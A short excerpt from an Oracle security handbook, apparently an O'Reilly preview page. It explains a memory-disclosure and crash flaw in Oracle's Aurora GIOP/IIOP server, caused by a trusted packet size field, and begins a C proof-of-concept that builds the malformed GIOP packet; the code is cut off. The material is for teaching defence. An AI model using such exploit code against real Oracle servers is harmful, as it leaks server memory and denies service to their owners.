3.2. The Aurora GIOP Server
By default, Oracle 9.0.1 and Oracle 8.1.7.4 both install an IIOP (Internet Inter-Orb Protocol) server to enable access to CORBA applications. IIOP is an implementation of GIOP — the General Inter-Orb Protocol. A vulnerability in this server can allow attackers to either dump arbitrary memory from the server over the network or crash the server. This flaw has been reported to Oracle and a patch will be forthcoming. GIOP packets have a size element to their header that indicates how much data the client is sending. The server uses this size parameter to build its response. If the client sends a size larger than the data they're actually sending, then the server will just happily read what data is in the memory up to the size specified by the attacker. This way an attacker can begin to poke about the contents of the memory of the TNS Listener. If the size is large enough, the Listener eventually attempts to read uninitialized memory and access violates —thus denying service. The following code demonstrates this:
#include <stdio.h> #include <windows.h> #include <winsock.h> int SendGIOPPacket(void); int StartWinsock(void); int packet_length(char *); int PrintResponse(unsigned char *p, int l); int bswap_i(unsigned int); struct sockaddr_in s_sa; struct hostent *he; unsigned int addr; int IIOPPort=2481; char host[260]="";
int PKT_LEN = 148; unsigned char GIOPPacketHeader[2000]= "\x47\x49\x4f\x50" // MAGIC "\x01\x00" // VERSION "\x00" // BYTE ORDER "\x00" // ...
Get The Oracle® Hacker's Handbook: Hacking and Defending Oracle now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.
